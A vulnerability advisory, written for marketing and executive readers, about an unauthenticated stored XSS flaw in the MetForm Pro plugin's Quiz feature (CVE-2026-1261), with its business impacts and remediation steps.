Attack Vectors

MetForm Pro (slug: metform-pro) is affected by a High-severity vulnerability that allows unauthenticated stored cross-site scripting (Stored XSS) through the plugin’s Quiz feature in versions 3.9.6 and earlier. Because no login is required, an attacker can target public-facing pages where quiz inputs are accepted and store malicious script content that runs later when others view the affected page.

This issue is tracked as CVE-2026-1261 (CVSS 7.2, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N). Details are available at https://www.cve.org/CVERecord?id=CVE-2026-1261.

Security Weakness

The vulnerability stems from insufficient input sanitization and output escaping in the Quiz feature. In practical terms, the plugin may accept and later display user-supplied content without adequately filtering it and without safely rendering it as text, allowing injected scripts to be stored and executed in visitors’ browsers.

Because the execution happens in the context of your website (and potentially your logged-in staff users), the impact can extend beyond a single page view and become a repeatable, scalable way to target customers, employees, and administrators.

Technical or Business Impacts

Stored XSS can be used to mislead visitors, alter on-page content, and capture sensitive information entered into forms. For marketing teams, this creates direct risks to campaign performance and brand trust: visitors may see defaced pages, malicious redirects, fake offers, or altered calls-to-action that damage conversion rates and attribution accuracy.

For executives and compliance stakeholders, the most significant business risks include: data exposure (e.g., information entered into forms), account takeover risk if staff sessions are targeted, reputation damage from visible site tampering, and regulatory or contractual consequences if personal data is captured or mishandled. The “stored” nature means the malicious content can keep executing until it’s found and removed, increasing dwell time and downstream impact.

Remediation: Update MetForm Pro to version 3.9.7 or a newer patched version. After updating, review quiz-related pages and entries for unexpected content, and consider rotating passwords or invalidating sessions for administrative users if suspicious activity is detected. For reference, the vendor/community advisory is available via Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/id/e6361ada-f2ba-404e-b9d3-b169da44aa90.

Similar Attacks

Stored XSS has been used in real-world incidents to spread quickly and impact large audiences. Well-known examples include the Samy worm on MySpace, which propagated via stored scripting in user profiles, and the 2010 Twitter “onMouseOver” worm, which leveraged XSS-like behavior to spread at scale.